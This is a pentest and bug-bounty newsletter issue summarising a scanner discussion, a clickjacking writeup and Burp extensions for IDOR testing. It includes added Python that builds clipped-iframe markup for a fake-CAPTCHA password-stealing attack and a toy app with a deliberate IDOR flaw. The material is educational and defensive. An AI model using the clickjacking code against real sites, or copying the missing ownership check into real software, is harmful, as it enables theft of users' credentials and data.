The 5 Hacking NewsLetter 86
Posted in Newsletter on December 31, 2019
Posted in Newsletter on July 2, 2019
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from June 21 to June 28.
Do you use vulnerability scanner on bug bounty program? How is the result?
This is an interesting discussion for beginner bug hunters on why you shouldn't use scanners in bug bounty. Vulnerability scanners are of low added value because many other people (including internal pentesters) have probably already run them, so it's improbable that they'll find anything new of real value. This, combined with the risk of causing a Denial of Service if many bug hunters point scanners at the same target, is why most programs forbid them.
Two further risks apply to pentesting too: flooding a client email address (every form a scanner or spider submits can trigger a message; happened to me once!), and deleting resources by spidering authenticated pages, since the crawler follows every link it finds, "delete" actions included.
These risks are good to know whether you’re a bug hunter or pentester. It helps decide which tools to run or not and avoid causing service disruptions.
Also, I find cym13’s stance on Burp interesting. There really is no ‘one size fits all’!
GOTCHA: Taking phishing to a whole new level ($100 + $1000 bonus for creativity)
This is a writeup of a Clickjacking attack found during a live hacking event.
What tipped off @securinti was a button that triggered an AJAX request to display the user's password on the page. The response carried no X-Frame-Options header, so he could load that page in an iframe and have the password rendered inside it. Classic clickjacking, except that the attacker's page still can't read the contents of a cross-origin frame: the same-origin policy (the writeup calls it CORS) stops his script from reading the password.
His genius idea was to make the victim read the password out to him. He built an iframe that looked like a CAPTCHA form and scrambled the order of the password's letters, so the user wouldn't recognise their own password. When the user typed in the "CAPTCHA", he received the scrambled string, reordered the letters and had the password.
If you want to know more about this kind of attacks, I recommend the paper Tell Me About Yourself: The Malicious CAPTCHA Attack.
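As an added illustration (this code is not from the newsletter or from the writeup it links to), the two halves of the attack above in Python: a header check that tells you whether a page can be framed at all, and the scrambled-CAPTCHA trick, which works because the attacker never needs to read the secret. The attacker only chooses the order in which clipped iframes of the victim page are laid out, so the victim types the characters in a permuted order and the attacker undoes the permutation. The header values, pixel offsets, victim URL and sample password are constructed for the example; the markup is hypothetical.

```python
"""Framing check plus the scrambled-CAPTCHA permutation (added example)."""
import random
from typing import Dict, List


def framing_allowed(headers: Dict[str, str], attacker_origin: str) -> bool:
    """True if a page with these response headers can be framed from attacker_origin.

    Browsers give CSP frame-ancestors precedence over X-Frame-Options, so it is
    checked first. Source matching is simplified to exact origins, 'none' and '*'
    (no scheme-only or wildcard-host sources). ALLOW-FROM is obsolete and ignored
    by current browsers, so it counts as no protection here.
    """
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = {s.strip("'").lower() for s in parts[1:]}
            if "none" in sources:
                return False
            return "*" in sources or attacker_origin.lower() in sources
    xfo = h.get("x-frame-options", "").strip().upper()
    return xfo not in ("DENY", "SAMEORIGIN")


def choose_layout(secret_length: int, seed: int) -> List[int]:
    """Display order: fake-CAPTCHA slot i shows character secret[order[i]].

    The attacker knows `order` (it is just which clip offset each iframe gets)
    without ever seeing the characters themselves."""
    order = list(range(secret_length))
    random.Random(seed).shuffle(order)
    return order


def slot_html(slot: int, order: List[int], victim_url: str,
              field_left: int, field_top: int, char_width: int, char_height: int) -> str:
    """One clipped iframe per slot (hypothetical markup). The wrapper is the size
    of a single character; the iframe inside is shifted so that only character
    order[slot] of the framed password field shows through."""
    x = -(field_left + order[slot] * char_width)
    y = -field_top
    return (
        f'<div style="display:inline-block;overflow:hidden;'
        f'width:{char_width}px;height:{char_height}px">'
        f'<iframe src="{victim_url}" scrolling="no" style="border:0;'
        f'width:1000px;height:800px;margin-left:{x}px;margin-top:{y}px"></iframe></div>'
    )


def victim_types(secret: str, order: List[int]) -> str:
    """Simulation of the victim reading the fake CAPTCHA left to right."""
    return "".join(secret[i] for i in order)


def recover_secret(typed: str, order: List[int]) -> str:
    """Invert the permutation: typed[slot] is secret[order[slot]]."""
    out = [""] * len(order)
    for slot, src in enumerate(order):
        out[src] = typed[slot]
    return "".join(out)


def simulate(secret: str, seed: int) -> str:
    """End to end: lay out the slots, let the victim type, recover the secret."""
    order = choose_layout(len(secret), seed)
    return recover_secret(victim_types(secret, order), order)


if __name__ == "__main__":
    # Constructed: the page is frameable, so the CAPTCHA trick is viable.
    print(framing_allowed({"Content-Type": "text/html"}, "https://evil.example"))
    print(simulate("hunter2", 2019))
```

The fix on the target side is either `X-Frame-Options: DENY` or, preferably, `Content-Security-Policy: frame-ancestors 'none'` on the response that renders the secret; `framing_allowed` returns False for both, and you can run it over a proxy history to triage which pages are candidates for this kind of attack.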
Burp Suite tutorial: IDOR vulnerability automation using Autorize and AutoRepeater (bug bounty)
This video tutorial is a must if you're serious about Web app security and don't already use Autorize and AutoRepeater. These are two Burp Suite extensions that can, among other things, be used to detect IDOR automatically: every request you make as a privileged user is replayed with a lower-privileged session (and with no session), and the responses are compared.
This kind of advanced Burp usage can seem overwhelming or confusing if you’re starting out. So it’s nice to be walked through the whole process. Thank you @Regala_ and @stokfredrik!
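To make the comparison concrete, here is the check Autorize automates, re-implemented in Python against a toy in-memory app so it runs offline. This is an added example, not Autorize's or AutoRepeater's code: the app, its two routes, the user records, the session cookies and the "enforcement" strings are all constructed for the example. One route deliberately has the IDOR; the other checks ownership.

```python
"""Autorize-style authorization check against a constructed toy app (added example)."""
import json
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class Response:
    status: int
    body: str


# Constructed data: two users, each with a session cookie.
USERS = {1: {"email": "alice@example.com", "card_last4": "4242"},
         2: {"email": "bob@example.com", "card_last4": "9876"}}
SESSIONS = {"sess-alice": 1, "sess-bob": 2}


def toy_app(path: str, cookie: Optional[str]) -> Response:
    """Two endpoints. /api/profile/<id> has an IDOR (deliberate: this is the
    'before' case); /api/settings/<id> checks ownership correctly."""
    uid = SESSIONS.get(cookie or "")
    if uid is None:
        return Response(401, json.dumps({"error": "login required"}))
    prefix, _, tail = path.rpartition("/")
    if not tail.isdigit():
        return Response(404, "{}")
    target = int(tail)
    if prefix == "/api/profile":
        # BUG: confirms that *a* user is logged in but never that target == uid.
        rec = USERS.get(target)
        return Response(200, json.dumps(rec)) if rec else Response(404, "{}")
    if prefix == "/api/settings":
        if target != uid:  # the check the profile route is missing
            return Response(403, json.dumps({"error": "forbidden"}))
        return Response(200, json.dumps({"uid": uid, "mfa": True}))
    return Response(404, "{}")


# Constructed "enforcement detector" strings, the equivalent of the ones you
# configure in Autorize for the target's own denial messages.
ENFORCEMENT_MARKERS = ("forbidden", "login required")


def classify(original: Response, replayed: Response) -> str:
    """Verdict in Autorize's three buckets. Same status and body length as the
    privileged response means the check was bypassed; a recognised denial means
    enforced; anything else needs a human look."""
    if replayed.status == original.status and len(replayed.body) == len(original.body):
        return "Bypassed!"
    if replayed.status in (401, 403) or any(m in replayed.body for m in ENFORCEMENT_MARKERS):
        return "Enforced!"
    return "Is enforced???"


def autorize(app: Callable[[str, Optional[str]], Response], paths: List[str],
             high_cookie: str, low_cookie: str) -> Dict[str, Tuple[str, str]]:
    """For each path the high-privilege user requested, replay it with the
    low-privilege cookie and with no cookie; return both verdicts."""
    results: Dict[str, Tuple[str, str]] = {}
    for path in paths:
        original = app(path, high_cookie)
        low = app(path, low_cookie)
        unauth = app(path, None)
        results[path] = (classify(original, low), classify(original, unauth))
    return results


if __name__ == "__main__":
    history = ["/api/profile/1", "/api/settings/1"]  # what alice browsed through the proxy
    for path, (low, unauth) in autorize(toy_app, history, "sess-alice", "sess-bob").items():
        print(f"{path:18} low-priv: {low:15} unauth: {unauth}")
```

Two caveats carry over to the real extension. The length comparison is a heuristic: if the response embeds per-user data of a different length (a name, a timestamp) a real bypass lands in the "Is enforced???" bucket, and two denials of the same length as a success would look like a bypass, so configure the enforcement detector with the target's actual denial strings and eyeball the unclear ones. And the replay only tests the identifiers the privileged user actually requested; rewriting those IDs to another user's is what AutoRepeater's replacement rules are for.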
Hands on Hacking with zseano & Bugbountynotes session carrying on
I lo-o-ove this live mentoring concept by @zseano. It is a great opportunity to spend a few hours hacking on a fake website created for the occasion, while being live with an online mentor, and also practice writing bug bounty reports. It’s fun whether you’re a beginner or a seasoned bug hunter.
I had network connection issues right when the live started. That was so annoying! But the next session is on July 21st.
Taborator is a Burp extension that shows the Collaborator client in a tab (instead of the separate Burp window it opens by default).
So it's more practical if you use Collaborator often. It's worth checking out and is easy to install (via the BApp Store) and use.
See more writeups on The list of bug bounty writeups.
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 06/21/2019 to 06/28/2019.
Have a nice week folks!
If you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…